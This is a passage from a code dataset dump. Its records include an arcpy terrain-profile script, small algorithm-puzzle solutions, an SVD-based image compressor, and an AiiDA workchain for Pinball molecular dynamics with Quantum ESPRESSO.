str(raster)\n if raster.startswith(raster_prefix) == True:\n arcpy.management.CopyFeatures(\"profiles_{}\".format(str(raster)), \"profiles_test\")\n profiles = \"profiles_test\"\n \n # calculate bearing \n arcpy.management.CalculateGeometryAttributes(profiles, [[\"bearing_1\", \"LINE_BEARING\"],[\"midpoint_x\", \"CENTROID_X\"],[\"midpoint_y\", \"CENTROID_Y\"]])\n arcpy.management.CalculateField(profiles, \"bearing_2\", \"$feature.bearing_1-180\", \"ARCADE\")\n arcpy.management.CalculateField(profiles, \"half_length\", \"round(!SHAPE.LENGTH!/2)\",\"PYTHON3\") \n # iterate over profiles:\n profile_cursor = arcpy.da.SearchCursor(profiles,['bearing_1','bearing_2','midpoint_x','midpoint_y','half_length','SHAPE@','profielnummer'])\n for row in profile_cursor:\n\n attempts = list(range(0,11))\n bearing = row[0]-90\n profile_number = row[6]\n profile = \"testprofile\"\n where = '\"profielnummer\" = {}'.format(profile_number)\n arcpy.Select_analysis(profiles, profile, where)\n\n profile_list = []\n for item in attempts:\n arcpy.management.CalculateField(profile, \"bearing_1\", \"'\"+ 
str(round(bearing)) +\"'\", \"PYTHON3\")\n arcpy.management.CalculateField(profile, \"bearing_2\", \"'\"+ str(round(bearing-180)) +\"'\", \"PYTHON3\")\n \n arcpy.BearingDistanceToLine_management(profile, \"tester_1_{}\".format(str(item)), \"midpoint_x\", \"midpoint_y\", distance_field=\"half_length\",bearing_field=\"bearing_1\")\n arcpy.BearingDistanceToLine_management(profile, \"tester_2_{}\".format(str(item)), \"midpoint_x\", \"midpoint_y\", distance_field=\"half_length\",bearing_field=\"bearing_2\")\n bearing += 18\n print(bearing)\n\n\n \n\n arcpy.management.Merge([\"tester_1_{}\".format(str(item)),\"tester_2_{}\".format(str(item))],\"templayer\")\n arcpy.management.Dissolve(\"templayer\", \"profile_{}\".format(item))\n \n profile_list.append(\"profile_{}\".format(item))\n\n arcpy.management.Merge(profile_list ,\"profiles\")\n # add code field\n arcpy.AddField_management(\"profiles\", code, \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.AddField_management(\"profiles\", \"profielnummer\", \"DOUBLE\", 2, field_is_nullable=\"NULLABLE\")\n arcpy.management.CalculateField(\"profiles\", code, \"'code'\", \"PYTHON3\")\n arcpy.management.CalculateField(\"profiles\", \"profielnummer\", '!OBJECTID!', \"PYTHON3\")\n copy_trajectory_lr(trajectory,code,1)\n set_measurements_trajectory(\"profiles\", trajectory, code, point_interval)\n\n \n \n break\n \nrewrite_rasters()\nprofiles_part1()\n# find_steepest_profile()\n","repo_name":"vincentwolf89/wsrlOpenGeo","sub_path":"total.py","file_name":"total.py","file_ext":"py","file_size_in_byte":20599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70179697327","text":"def jumpingOnClouds(c):\n current = 0\n end = len(c) - 1\n counts = 0\n while current < end:\n if ((current + 2) <= end) and (c[current + 2] == 0):\n current += 2\n counts += 1\n elif c[current + 1] == 0:\n current += 1\n counts += 1\n return counts\n\nprint(jumpingOnClouds([0,1, 0, 0, 0, 1,0]))","repo_name":"Anuoluwa/CSC","sub_path":"Code_Challenge/solution_py/jumpOnClouds.py","file_name":"jumpOnClouds.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71373138607","text":"#\n# 面试题 04.06\n#\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def inorderSuccessor(self, root: TreeNode, p: TreeNode) -> TreeNode:\n if not root:\n return\n cur, res = root, None\n while cur:\n if cur.val > p.val:\n res = cur\n cur = cur.left\n else:\n cur = cur.right\n return res\n","repo_name":"dreamhunter2333/leetcode_practise","sub_path":"leetcode/面试题04.06.py","file_name":"面试题04.06.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"24389912955","text":"import numpy\nfrom PIL import Image\n\n\n# FUNCTION DEFINTIONS:\n\n# open the image and return 3 matrices, each corresponding to one channel (R, G and B channels)\ndef openImage(imagePath):\n imOrig = Image.open(imagePath)\n im = numpy.array(imOrig)\n\n aRed = im[:, :, 0]\n aGreen = im[:, :, 1]\n aBlue = im[:, :, 2]\n\n return [aRed, aGreen, aBlue, imOrig]\n\n\n# compress the matrix of a single channel\ndef compressSingleChannel(channelDataMatrix, singularValuesLimit):\n uChannel, sChannel, vhChannel = numpy.linalg.svd(channelDataMatrix)\n aChannelCompressed = numpy.zeros((channelDataMatrix.shape[0], channelDataMatrix.shape[1]))\n k = singularValuesLimit\n\n leftSide = numpy.matmul(uChannel[:, 0:k], numpy.diag(sChannel)[0:k, 0:k])\n aChannelCompressedInner = numpy.matmul(leftSide, vhChannel[0:k, :])\n aChannelCompressed = aChannelCompressedInner.astype('uint8')\n return aChannelCompressed\n\n\n# MAIN PROGRAM:\ndef compressImage(nameImage):\n print('Starting Compression')\n aRed, aGreen, aBlue, originalImage = openImage(nameImage)\n # image width and height:\n imageWidth,imageHeight = originalImage.size\n # number of singular values to use for reconstructing the compressed image\n singularValuesLimit = 300\n #Compress in single channel for each color\n aRedCompressed = compressSingleChannel(aRed, singularValuesLimit)\n aGreenCompressed = compressSingleChannel(aGreen, singularValuesLimit)\n aBlueCompressed = compressSingleChannel(aBlue, singularValuesLimit)\n #reconstruct image\n imr = Image.fromarray(aRedCompressed, mode=None)\n img = Image.fromarray(aGreenCompressed, mode=None)\n imb = Image.fromarray(aBlueCompressed, mode=None)\n newImage = Image.merge(\"RGB\", (imr, img, imb))\n originalImage.show()\n newImage.show()\n #SAVE IN HDD THE NEW IMAGE\n newImage = newImage.save(\"nuevafoto.jpg\")\n #Convert RGB to Grayscale\n imgGs = Image.open('nuevafoto.jpg').convert('LA')\n imgGs.save('greyscalefoto.png')\n imgGs.show()\n\n #Print some info\n mr = imageHeight\n mc = imageWidth\n originalSize = mr * mc * 3\n compressedSize = singularValuesLimit * (1 + mr + mc) * 3\n ratio = compressedSize * 1.0 / originalSize\n print('original size:')\n print(originalSize)\n print('compressed size:')\n print(compressedSize)\n print('Compressed image size is ' + str(round(ratio * 100, 2)) + '% of the original image ')\n print('DONE - Compressed the image')\n\ncompressImage('foto.jpg')","repo_name":"rodo-code/ImageCompressorSVD","sub_path":"compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"22714629466","text":"# -*- coding: utf-8 -*-\n\"\"\"Workchain to run MD calculations using Pinball pw.x. based on Quantum ESPRESSO\"\"\"\nfrom aiida import orm\nfrom aiida.common import AttributeDict, exceptions\nfrom aiida.common.links import LinkType\nfrom aiida.engine import ToContext, if_, while_, BaseRestartWorkChain, process_handler, ProcessHandlerReport, ExitCode\nfrom aiida.plugins import CalculationFactory, GroupFactory, WorkflowFactory\n\n## builder imports\nfrom aiida.common.lang import type_check\nfrom aiida_quantumespresso.common.types import ElectronicType, SpinType\nSsspFamily = GroupFactory('pseudo.family.sssp')\nPseudoDojoFamily = GroupFactory('pseudo.family.pseudo_dojo')\nCutoffsPseudoPotentialFamily = GroupFactory('pseudo.family.cutoffs')\n\nfrom aiida_quantumespresso.utils.defaults.calculation import pw as qe_defaults\nfrom aiida_quantumespresso.workflows.pw.base import PwBaseWorkChain\nfrom aiida_flipper.utils.utils import get_or_create_input_node\nfrom aiida_flipper.calculations.functions.functions import get_structure_from_trajectory, concatenate_trajectory\n\nPwCalculation = CalculationFactory('quantumespresso.pw')\nFlipperCalculation = CalculationFactory('quantumespresso.flipper')\n#HustlerCalculation = CalculationFactory('quantumespresso.hustler')\n\n\ndef get_completed_number_of_steps(calc):\n \"\"\"Read the number of steps from the trajectory.\"\"\"\n traj = calc.outputs.output_trajectory\n nstep = calc.inputs.parameters.get_attribute('CONTROL').get('iprint', 1) * \\\n (traj.get_attribute('array|positions')[0] - 1) # the zeroth step is also saved\n return nstep\n\ndef get_total_trajectory(workchain, previous_trajectory=None, store=False):\n \"\"\"Collect all the trajectory segment and concatenate them.\"\"\"\n qb = orm.QueryBuilder()\n qb.append(orm.WorkChainNode, filters={'uuid': workchain.uuid}, tag='replay')\n # TODO: Are filters on the state of the calculation needed here?\n # TODO: add project on extras.discard_trajectory, traj_d defined to skip them\n qb.append(orm.CalcJobNode, with_incoming='replay',\n edge_filters={'type': LinkType.CALL_CALC.value,\n 'label': {'like': 'iteration_%'}},\n edge_project='label', tag='calc', edge_tag='rc')\n qb.append(orm.TrajectoryData, with_incoming='calc', edge_filters={'label': 'output_trajectory'},\n project=['*'], tag='traj')\n traj_d = {item['rc']['label'].replace('iteration_', 'trajectory_'): item['traj']['*'] for item in qb.iterdict()} ## if not extras.discard_trajectory\n\n # adding the trajectory of previous MD run, if it exists\n if previous_trajectory:\n traj_d.update({'trajectory_00': previous_trajectory})\n\n # if I have produced several trajectories, I concatenate them here: (no need to sort them)\n if (len(traj_d) > 1):\n traj_d['metadata'] = {'call_link_label': 'concatenate_trajectory', 'store_provenance': store}\n traj_d.update({'remove_repeated_last_step': True})\n res = concatenate_trajectory(**traj_d)\n return res['concatenated_trajectory']\n elif (len(traj_d) == 1):\n # no reason to concatenate if I have only one trajectory (saves space in repository)\n return list(traj_d.values())[0]\n else:\n return None\n\ndef get_slave_calculations(workchain):\n \"\"\"\n Returns a list of the calculations that was called by the WF, ordered.\n \"\"\"\n qb = orm.QueryBuilder()\n qb.append(orm.WorkChainNode, filters={'uuid': workchain.uuid}, tag='m')\n qb.append(orm.CalcJobNode, with_incoming='m',\n edge_project='label', edge_filters={'label': {'like': 'iteration_%'}},\n tag='c', edge_tag='mc', 
project='*')\n calc_d = {item['mc']['label']: item['c']['*'] for item in qb.iterdict()}\n sorted_calcs = sorted(calc_d.items())\n return list(zip(*sorted_calcs))[1] if sorted_calcs else None\n\n\nclass ReplayMDWorkChain(PwBaseWorkChain):\n \"\"\"\n Workchain to run a molecular dynamics Quantum ESPRESSO pw.x calculation with automated error handling and restarts.\n\n `nstep` can be specified as input or in the `CONTROL.nstep` attribute of the parameters node.\n\n Velocities are read from the `ATOMIC_VELOCITIES` key of the settings node.\n If not found they will be initialized.\n \"\"\"\n ## NOTES ##\n # with 'replay' we indicate a molecular dynamics restart, in which positions & velocities are read from the\n # last step of the previous trajectory. In this work chain we always perform a 'dirty restart', i.e. the charge\n # densities are always initialized from scratch (we do not use the `restart_mode='restart'` of QE).\n # In reality, in the Pinball code the host-lattice charge density is always read from file. Therefore we always\n # set a `parent_folder`, such that the plugin will copy it to the new location when restarting.\n #\n # The parser of a FlipperCalculation will return an output trajectory node if it manages to parse it.\n # As long as an output trajectory was produced, erros raised from the parsing of the aiida.out log file\n # (e.g. out of walltime, incomplete output, ...) will be ignored and we shall try to (dirty) restart.\n\n ## QUESTION ##\n # probably we could define the `_process_class` at the instance level, thus allowing one to choose\n # to use either a `PwCalculation`, `FlipperCalculation`, or `HustlerCalculation` without redefining this class.\n # The drawback is probably that (I guess) the inputs will not be exposed (in the builder?)?\n # Alternatively, one could just define subclasses where `_process_class` is set accordingly.\n _process_class = FlipperCalculation # probably we can define this in a subclass\n\n defaults = AttributeDict({\n 'qe': qe_defaults,\n 'delta_threshold_degauss': 30,\n 'delta_factor_degauss': 0.1,\n 'delta_factor_mixing_beta': 0.8,\n 'delta_factor_max_seconds': 0.90,\n 'delta_max_seconds': 180,\n 'delta_factor_nbnd': 0.05,\n 'delta_minimum_nbnd': 4,\n })\n\n @classmethod\n def define(cls, spec):\n \"\"\"Define the process specification.\"\"\"\n # yapf: disable\n # NOTE: input, outputs, and exit_codes are inherited from PwBaseWorkChain\n super().define(spec)\n spec.expose_inputs(FlipperCalculation, namespace='pw', exclude=('kpoints',))\n\n # the calculation namespace is still 'pw'\n spec.inputs['pw']['parent_folder'].required = True\n #spec.inputs.pop('pw.metadata.options.without_xml')\n\n # this stuff is not supported by pinball:\n spec.inputs['pw'].pop('hubbard_file')\n spec.inputs['pw'].pop('vdw_table')\n spec.inputs.pop('automatic_parallelization')\n\n spec.input('nstep', valid_type=orm.Int, required=False,\n help='Number of MD steps (it will be read from the input parameters otherwise).')\n #spec.input('is_hustler', valid_type=orm.Bool, required=False, default=lambda: orm.Bool(False))\n spec.input('total_energy_max_fluctuation', valid_type=orm.Float, required=False,\n help='The maximum total energy fluctuation allowed (eV). 
If the total energy has varied more than this '\n 'threshold, the workchain will fail.')\n spec.input('previous_trajectory', valid_type=orm.TrajectoryData, required=False,\n help='Trajectory of previous calculation, needed to pickup from last MD run (otherwise we do a normal start from flipper compatible structure).')\n\n spec.outline(\n cls.setup,\n cls.validate_parameters,\n cls.validate_kpoints,\n cls.validate_pseudos,\n # cls.validate_resources,\n #if_(cls.should_run_init)(\n # cls.validate_init_inputs,\n # cls.run_init,\n # cls.inspect_init,\n #),\n while_(cls.should_run_process)(\n cls.prepare_process,\n cls.run_process,\n cls.inspect_process,\n cls.check_energy_fluctuations,\n cls.update_mdsteps,\n ),\n cls.results,\n )\n\n #spec.expose_outputs(PwCalculation)\n spec.outputs.clear()\n spec.output('total_trajectory', valid_type=orm.TrajectoryData, required=True,\n help='The full concatenated trajectory.')\n spec.default_output_node = 'total_trajectory'\n\n spec.inputs['handler_overrides'].default = lambda: orm.Dict(dict={\n 'sanity_check_insufficient_bands': False,\n 'handle_out_of_walltime': True,\n 'handle_vcrelax_converged_except_final_scf': False,\n 'handle_relax_recoverable_ionic_convergence_error': False,\n 'handle_relax_recoverable_electronic_convergence_error': False,\n #'handle_electronic_convergence_not_achieved': False,\n })\n\n # TODO: we should pop the spec.exit_codes that do not apply\n spec.exit_code(205, 'ERROR_INVALID_INPUT_MD_PARAMETERS',\n message='Input parameters for molecular dynamics are not correct.')\n spec.exit_code(206, 'ERROR_INVALID_INPUT_VELOCITIES',\n message='Velocities are not compatible with the number of atoms of the structure.')\n spec.exit_code(601, 'ERROR_TOTAL_ENERGY_FLUCTUATIONS',\n message='Fluctuations of the total energy exceeded the set threshold.')\n\n def setup(self):\n \"\"\"Call the `setup` of the `PwBaseWorkChain` and then create the inputs dictionary in `self.ctx.inputs`.\n\n This `self.ctx.inputs` dictionary will be used by the `BaseRestartWorkChain` to submit the calculations in the\n internal loop.\n \"\"\"\n super().setup()\n #self.ctx.restart_calc = None\n self.ctx.inputs = AttributeDict(self.exposed_inputs(FlipperCalculation, 'pw'))\n\n self.ctx.inputs.parameters = self.ctx.inputs.parameters.get_dict()\n self.ctx.inputs.settings = self.ctx.inputs.settings.get_dict() if 'settings' in self.ctx.inputs else {}\n \n self.ctx.inputs.pop('vdw_table', None)\n self.ctx.inputs.pop('hubbard_file', None)\n self.ctx.mdsteps_done = 0\n \n @classmethod\n def get_protocol_filepath(cls):\n \"\"\"Return ``pathlib.Path`` to the ``.yaml`` file that defines the protocols.\"\"\"\n from importlib_resources import files\n from aiida_flipper.workflows import protocols as proto\n return files(proto) / 'replay.yaml'\n\n @classmethod\n def get_builder_from_protocol(\n cls,\n code,\n structure,\n parent_folder,\n nstep=None,\n total_energy_max_fluctuation=None,\n previous_trajectory=None,\n protocol=None,\n overrides=None,\n electronic_type=ElectronicType.INSULATOR,\n spin_type=SpinType.NONE,\n initial_magnetic_moments=None,\n **_\n ):\n \"\"\"\n !! 
This is a copy of PwBaseWorkChain get_builder_from_protocol() with a change of default\n electronic type to insulator and addition of flipper inputs and loading of flipper protocol file!!\n Return a builder prepopulated with inputs selected according to the chosen protocol.\n :param code: the ``Code`` instance configured for the ``quantumespresso.pw`` plugin.\n :param structure: the ``StructureData`` instance to use.\n :param parent_folder: the location of charge densities of host lattice\n :param nstep: the number of MD steps to perform, which in case of hustler calculation means the number of configurations on which pinball/DFT forces will be evaluated\n :param total_energy_max_fluctuation: If the total energy exceeeds this threshold I will stop the workchain\n :param previous_trajectory: if provided I will start the calculation from the positions and velocities of that trajectory\n :param protocol: protocol to use, if not specified, the default will be used.\n :param overrides: optional dictionary of inputs to override the defaults of the protocol.\n :param electronic_type: indicate the electronic character of the system through ``ElectronicType`` instance.\n :param spin_type: indicate the spin polarization type to use through a ``SpinType`` instance.\n :param initial_magnetic_moments: optional dictionary that maps the initial magnetic moment of each kind to a\n desired value for a spin polarized calculation. Note that for ``spin_type == SpinType.COLLINEAR`` an \n initial guess for the magnetic moment is automatically set in case this argument is not provided.\n :return: a process builder instance with all inputs defined ready for launch.\n \"\"\"\n from aiida_quantumespresso.workflows.protocols.utils import get_starting_magnetization\n\n if isinstance(code, str):\n code = orm.load_code(code)\n\n type_check(code, orm.Code)\n type_check(electronic_type, ElectronicType)\n type_check(spin_type, SpinType)\n\n if electronic_type not in [ElectronicType.METAL, ElectronicType.INSULATOR]:\n raise NotImplementedError(f'electronic type `{electronic_type}` is not supported.')\n\n if spin_type not in [SpinType.NONE, SpinType.COLLINEAR]:\n raise NotImplementedError(f'spin type `{spin_type}` is not supported.')\n\n if initial_magnetic_moments is not None and spin_type is not SpinType.COLLINEAR:\n raise ValueError(f'`initial_magnetic_moments` is specified but spin type `{spin_type}` is incompatible.')\n\n inputs = cls.get_protocol_inputs(protocol, overrides)\n\n meta_parameters = inputs.pop('meta_parameters')\n pseudo_family = inputs.pop('pseudo_family')\n\n natoms = len(structure.sites)\n\n try:\n pseudo_set = (PseudoDojoFamily, SsspFamily, CutoffsPseudoPotentialFamily)\n pseudo_family = orm.QueryBuilder().append(pseudo_set, filters={'label': pseudo_family}).one()[0]\n except exceptions.NotExistent as exception:\n raise ValueError(\n f'required pseudo family `{pseudo_family}` is not installed. 
Please use `aiida-pseudo install` to'\n 'install it.'\n ) from exception\n\n try:\n cutoff_wfc, cutoff_rho = pseudo_family.get_recommended_cutoffs(structure=structure, unit='Ry')\n except ValueError as exception:\n raise ValueError(\n f'failed to obtain recommended cutoffs for pseudo family `{pseudo_family}`: {exception}'\n ) from exception\n\n parameters = inputs['pw']['parameters']\n # parameters['CONTROL']['etot_conv_thr'] = natoms * meta_parameters['etot_conv_thr_per_atom']\n parameters['ELECTRONS']['conv_thr'] = natoms * meta_parameters['conv_thr_per_atom']\n parameters['SYSTEM']['ecutwfc'] = cutoff_wfc\n parameters['SYSTEM']['ecutrho'] = cutoff_rho\n\n if electronic_type is ElectronicType.METAL:\n parameters['SYSTEM']['occupations'] = 'smearing'\n parameters['SYSTEM'].update({'degauss': 0.01, 'smearing': 'cold'})\n\n if spin_type is SpinType.COLLINEAR:\n starting_magnetization = get_starting_magnetization(structure, pseudo_family, initial_magnetic_moments)\n\n parameters['SYSTEM']['nspin'] = 2\n parameters['SYSTEM']['starting_magnetization'] = starting_magnetization\n\n # pylint: disable=no-member\n builder = cls.get_builder()\n builder.pw['code'] = code\n builder.pw['pseudos'] = pseudo_family.get_pseudos(structure=structure)\n # removing the default Li pseudopotential so that user can provide the correct one \n builder.pw['pseudos'].pop('Li')\n builder.pw['structure'] = structure\n builder.pw['parameters'] = orm.Dict(dict=parameters)\n builder.pw['metadata'] = inputs['pw']['metadata']\n if 'parallelization' in inputs['pw']:\n builder.pw['parallelization'] = orm.Dict(dict=inputs['pw']['parallelization'])\n builder.clean_workdir = orm.Bool(inputs['clean_workdir'])\n if 'settings' in inputs['pw']:\n builder['pw'].settings = orm.Dict(dict=inputs['pw']['settings'])\n if inputs['pw']['settings']['gamma_only']:\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([1,1,1])\n builder.kpoints = kpoints\n else: \n raise NotImplementedError('Only gamma k-points possible in flipper calculations.')\n\n builder['pw']['parent_folder'] = parent_folder\n builder['nstep'] = orm.Int(inputs['nstep'])\n if total_energy_max_fluctuation: \n builder['total_energy_max_fluctuation'] = total_energy_max_fluctuation\n else: \n builder['total_energy_max_fluctuation'] = orm.Float(0.5 * 1.e4 * natoms * meta_parameters['etot_conv_thr_per_atom'])\n if previous_trajectory: builder['previous_trajectory'] = previous_trajectory\n # pylint: enable=no-member\n return builder\n\n def validate_parameters(self):\n \"\"\"Validate inputs that might depend on each other and cannot be validated by the spec.\n\n Also define dictionary `inputs` in the context, that will contain the inputs for the calculation that will be\n launched in the `run_calculation` step.\n \"\"\"\n\n if not self.ctx.inputs.parameters['CONTROL']['calculation'] == 'md':\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS \n if self.inputs.get('is_hustler', False):\n raise NotImplementedError('Please run hustler workchain.')\n\n nstep = self.ctx.inputs.parameters['CONTROL'].get('nstep', None)\n inp_nstep = self.inputs.get('nstep')\n if inp_nstep and nstep:\n self.report('You cannot specify both \"nstep\" and \"parameters.CONTROL.nstep\"')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif inp_nstep is None and nstep is None:\n self.report('You must specify either \"nstep\" or \"parameters.CONTROL.nstep\"')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif inp_nstep:\n nstep = inp_nstep.value\n self.ctx.mdsteps_todo = 
nstep\n\n # In the pinball, the parent folder contains the host-lattice charge density and is always given as input,\n # so this is done automatically during the setup:\n # self.ctx.inputs.parent_folder = self.inputs.pw.parent_folder\n # We will not change the parent_folder after a replay\n\n # At each replay, a restart_calc will be set, meaning that md should be (dirty)-restarted from the trajectory\n # produced by the last calculation\n self.ctx.restart_calc = None\n\n # if velocities were given in the input parameters or settings, we will use them\n initial_velocities = self.ctx.inputs.settings.get('ATOMIC_VELOCITIES', None)\n params_velocities = self.ctx.inputs.parameters.pop('ATOMIC_VELOCITIES', None)\n if initial_velocities and params_velocities:\n self.report('Please specify initial ATOMIC_VELOCITIES either in parameters or in settings.')\n return self.exit_codes.ERROR_INVALID_INPUT_MD_PARAMETERS\n elif params_velocities:\n self.ctx.inputs.settings['ATOMIC_VELOCITIES'] = params_velocities\n initial_velocities = params_velocities\n if initial_velocities:\n self.ctx.has_initial_velocities = True\n if len(initial_velocities) != len(self.ctx.inputs.structure.sites):\n raise self.exit_codes.ERROR_INVALID_INPUT_VELOCITIES\n else:\n self.ctx.has_initial_velocities = False\n\n self.ctx.inputs.parameters.setdefault('CONTROL', {})\n self.ctx.inputs.parameters['CONTROL'].setdefault('calculation', 'md')\n #self.ctx.is_hustler = self.inputs.is_hustler\n\n # If trajectory is provided, check that the parameters are same across the 2 MD runs\n if self.inputs.get('previous_trajectory'):\n\n self.ctx.previous_trajectory = self.inputs.get('previous_trajectory')\n qb = orm.QueryBuilder()\n qb.append(orm.TrajectoryData, filters={'id':{'==':self.ctx.previous_trajectory.pk}}, tag='traj')\n qb.append(CalculationFactory('quantumespresso.flipper'), with_outgoing='traj')\n if qb.count():\n cc, = qb.first()\n param_d = cc.inputs['parameters'].get_dict()\n struct = cc.inputs['structure']\n if struct.pk != self.ctx.inputs.structure.pk: raise Exception('Structure of previous trajectory not matching with input structure, please provide right trajectory.')\n if param_d['CONTROL']['iprint'] != self.ctx.inputs.parameters['CONTROL']['iprint']: raise Exception('iprint of previous trajectory not matching with input irpint, please provide right trajectory.')\n if param_d['CONTROL']['dt'] != self.ctx.inputs.parameters['CONTROL']['dt']: raise Exception('dt of previous trajectory not matching with input dt, please provide right trajectory.')\n else:\n self.report('WorkChain of previous trajectory not found, trying preceding concatenating calcfunction')\n qb = orm.QueryBuilder()\n qb.append(orm.TrajectoryData, filters={'id':{'==':self.ctx.previous_trajectory.pk}}, tag='traj')\n qb.append(orm.CalcFunctionNode, with_outgoing='traj', tag='calcfunc')\n qb.append(orm.TrajectoryData, with_outgoing='calcfunc', tag='old_traj')\n qb.append(WorkflowFactory('quantumespresso.flipper.replaymd'), with_outgoing='old_traj', tag='replay')\n if qb.count():\n wc, = qb.first()\n param_d = wc.inputs['pw']['parameters'].get_dict()\n struct = wc.inputs['pw']['structure']\n if struct.pk != self.ctx.inputs.structure.pk: raise Exception('Structure of previous trajectory not matching with input structure, please provide right trajectory.')\n if param_d['CONTROL']['iprint'] != self.ctx.inputs.parameters['CONTROL']['iprint']: raise Exception('iprint of previous trajectory not matching with input irpint, please provide right trajectory.')\n if 
param_d['CONTROL']['dt'] != self.ctx.inputs.parameters['CONTROL']['dt']: raise Exception('dt of previous trajectory not matching with input dt, please provide right trajectory.')\n else:\n self.report('Calcfunction associated with previous trajectory not found; continuing nonetheless') \n \n # I update the mdsteps_todo here\n nsteps_of_previous_trajectory = self.ctx.inputs.parameters['CONTROL']['iprint'] * (self.ctx.previous_trajectory.attributes['array|positions'][0] - 1)\n self.ctx.mdsteps_todo -= nsteps_of_previous_trajectory\n # Even if the previous trajectory is longer than the required nsteps, I don't care, \n # mdsteps_todo will be -ve in that case and the replaymdwc will not be launched\n self.ctx.mdsteps_done += nsteps_of_previous_trajectory\n\n # if not self.ctx.inputs.parameters['CONTROL'].get('lflipper', False):\n # try:\n # if self.ctx.previous_trajectory.get_array('steps').size > 1:\n # raise Exception(f'The trajectory <{self.ctx.previous_trajectory.id}> provided for thermalisation is too long')\n # except (KeyError, exceptions.NotExistent):\n # raise RuntimeError('No trajectory found for thermalisation, aborting now')\n\n# def validate_kpoints(self):\n# \"\"\"Validate the inputs related to k-points.\n#\n# Either an explicit `KpointsData` with given mesh/path, or a desired k-points distance should be specified. In\n# the case of the latter, the `KpointsData` will be constructed for the input `StructureData` using the\n# `create_kpoints_from_distance` calculation function.\n# \"\"\"\n\n# def validate_pseudos(self):\n# \"\"\"Validate the inputs related to pseudopotentials.\n#\n# Either the pseudo potentials should be defined explicitly in the `pseudos` namespace, or alternatively, a family\n# can be defined in `pseudo_family` that will be used together with the input `StructureData` to generate the\n# required mapping.\n# \"\"\"\n\n# def validate_resources(self):\n# \"\"\"Validate the inputs related to the resources.\n#\n# One can omit the normally required `options.resources` input for the `PwCalculation`, as long as the input\n# `automatic_parallelization` is specified. 
If this is not the case, the `metadata.options` should at least\n# contain the options `resources` and `max_wallclock_seconds`, where `resources` should define the `num_machines`.\n# \"\"\"\n\n def set_max_seconds(self, max_wallclock_seconds):\n \"\"\"Set the `max_seconds` to a fraction of `max_wallclock_seconds` option to prevent out-of-walltime problems.\n\n :param max_wallclock_seconds: the maximum wallclock time that will be set in the scheduler settings.\n \"\"\"\n max_seconds_factor = self.defaults.delta_factor_max_seconds\n max_seconds_delta = self.defaults.delta_max_seconds\n # give the code 3 minutes to terminate gracefully, or 90% of your estimate (for very low numbers, to avoid negative)\n max_seconds = max((max_seconds_delta, max_wallclock_seconds * max_seconds_factor))\n self.ctx.inputs.parameters['CONTROL']['max_seconds'] = max_seconds\n # if needed, set the scheduler max walltime to be at least 1 minute longer than max_seconds\n self.ctx.inputs.metadata.options.update({'max_wallclock_seconds': max(max_wallclock_seconds, max_seconds + 60)})\n\n def should_run_process(self):\n \"\"\"Return whether a new process should be run.\n\n This is the case as long as the last process has not finished successfully, the maximum number of restarts has\n not yet been exceeded, and the number of desired MD steps has not been reached.\n \"\"\"\n return not(self.ctx.is_finished) and (self.ctx.iteration < self.inputs.max_iterations.value) and (self.ctx.mdsteps_todo > 0)\n\n def prepare_process(self):\n \"\"\"Prepare the inputs for the next calculation.\n\n In the pinball, the `parent_folder` is never changed, and the `restart_mode` is not set.\n\n If a `restart_calc` has been set in the context, the structure & velocities will be read from its output\n trajectory.\n \"\"\"\n # NOTE pinball: the parent folder (charge density) does not change, we do not need to specify the restart mode\n if self.ctx.restart_calc:\n # if it is a replay, extract structure and velocities from trajectory of restart_calc\n # NOTE (TODO): if we are retrying a calculation identical to the prev one (e.g. 
after an unhandled failure),\n # there is no need to extract the structure & velocities again\n try:\n prev_trajectory = self.ctx.restart_calc.outputs.output_trajectory\n except (KeyError, exceptions.NotExistent):\n raise RuntimeError('Previous trajectory not found!')\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n kwargs = {'trajectory': prev_trajectory,\n 'parameters': get_or_create_input_node(orm.Dict,\n dict(step_index=-1,\n recenter=False,\n create_settings=True,\n complete_missing=True),\n store=True),\n 'structure': self.ctx.inputs.structure,\n 'metadata': {'call_link_label': 'get_structure'}}\n if self.ctx.inputs.settings:\n kwargs['settings'] = get_or_create_input_node(orm.Dict, self.ctx.inputs.settings, store=True)\n\n res = get_structure_from_trajectory(**kwargs)\n\n self.ctx.inputs.structure = res['structure']\n self.ctx.inputs.settings = res['settings'].get_dict()\n #self.ctx.inputs.parameters['CONTROL']['restart_mode'] = 'restart' ## NOT NEEDED IN PINBALL\n elif self.inputs.get('previous_trajectory'):\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n kwargs = {'trajectory': self.ctx.previous_trajectory,\n 'parameters': get_or_create_input_node(orm.Dict,\n dict(step_index=-1,\n recenter=False,\n create_settings=True,\n complete_missing=True),\n store=True),\n 'structure': self.ctx.inputs.structure,\n 'metadata': {'call_link_label': 'get_structure'}}\n if self.ctx.inputs.settings:\n kwargs['settings'] = get_or_create_input_node(orm.Dict, self.ctx.inputs.settings, store=True)\n\n res = get_structure_from_trajectory(**kwargs)\n\n self.ctx.inputs.structure = res['structure']\n self.ctx.inputs.settings = res['settings'].get_dict()\n\n self.report(f'launching WorkChain from a previous trajectory <{self.ctx.previous_trajectory.pk}>')\n \n else:\n # start from scratch, eventually use `initial_velocities` if defined in input settings\n # (these were already added to `self.ctx.inputs.settings` by `validate_parameters`)\n if self.ctx.has_initial_velocities:\n self.ctx.inputs.parameters['IONS']['ion_velocities'] = 'from_input'\n #self.ctx.inputs.parameters['CONTROL']['restart_mode'] = 'from_scratch' ## NOT NEEDED IN PINBALL\n #self.ctx.inputs.pop('parent_folder', None)\n\n ## Setting wallclock option for smooth exit\n max_wallclock_seconds = 